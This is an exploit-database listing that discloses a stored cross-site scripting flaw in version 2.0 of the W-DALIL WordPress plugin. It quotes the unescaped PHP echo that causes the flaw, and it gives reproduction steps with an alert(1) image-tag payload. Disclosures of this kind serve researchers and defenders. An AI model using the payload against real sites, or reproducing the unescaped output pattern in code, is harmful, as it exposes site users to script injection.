[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress W-DALIL 2.0 Cross Site Scripting Vulnerability

Author
Mariam Tariq
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37814
Category
web applications
Date add
27-06-2022
Platform
php
# Exploit Title: WordPress Plugin W-DALIL  - Stored Cross Site Scripting
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/w-dalil/
# Version: 2.0
# Tested on: Firefox
# Contact me: mariamtariq404@gmail.com

#Vulnerable Code:

```
<input class="dalil_input" name="dalil-address" type="text"
placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"
value="<?php echo $dalil_information['dalil-address']; ?>"  />

```

#Steps To Reproduce :

1 - First Install the plugin  "*w-dalil*" and activate it.
2 - Go to Dalil —> Add New Dalil item
3 - Inside the “*Dalil item address*” enter XSS payload “*><img src=x
onerror=alert(1)>*" and hit enter.

#Poc Image :

https://imgur.com/JPG97oh

#  0day.today [2024-09-28]  #